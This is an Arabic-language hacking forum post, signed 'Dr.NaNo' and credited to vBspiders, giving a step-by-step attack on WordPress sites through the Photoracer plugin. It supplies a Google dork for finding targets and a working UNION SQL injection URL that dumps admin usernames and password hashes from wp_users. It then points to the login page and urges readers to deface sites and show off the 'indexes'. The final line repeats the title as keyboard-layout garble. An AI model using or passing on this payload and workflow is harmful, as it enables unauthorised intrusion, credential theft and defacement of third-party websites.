WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول

[Dr.NaNo]

السلام عليكم ورحمه الله وبركاته .

كيفكم . أخواني إن شاء الله الكل بخير ..


اليوم معي ، ثغرة حلوة في سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع المصابــة .

ونبغى نشوف ،، قسم االإنجازات مليان مواقع مخترقه من قبلكم ياعناكبي . ..


نبدأ بسم الله .:


أولا.:

الدوركـ .:

اقتباس inurl:"wp-content/plugins/photoracer/viewimg.php?id="

بتفتح قوقل كالعادة وبتحط الدورك وبتطلع لك مواقع واختار

اي واحد الي يعجبــك ..


ثانيــأ.:

الإٍستغلال .:

بتسوي كذا على طول ...:

اقتباس كود PHP: wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

يعني مثال .:

www.xxx.com/

انت خذ الاستغلال الي فوق وحطـه بعد رابط الموقع وشوف وش يطلع لك..

بطلع لك الباسورد واليوزر تبع الادمن .. .:


مثال كامل . على الاستغلال .:

اقتباس www.xxx.com/ wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users--

فهمـتووو كيف ياحلوين ..





ثالثـأ.:

لوحـة التحكم .:

اقتباس www.xxx.com/wp-login.php

بس بتسوي بعد رابط الموقع هيك .:

اقتباس wp-login.php

وبتطلع لك لوحـة التحكم ..... ..






يالله ، بدي اشوف اندكسات ..



أخوكم .:

كود PHP:

 Dr.NaNo 


بالتوفيــــــــــــــق لــكــم ..

المصدر: :: vBspiders Professional Network ::

---

WordPress v1>0 SQL Injection << juhg hguf td s;vfjhj ,v]vfvs iiii g,,g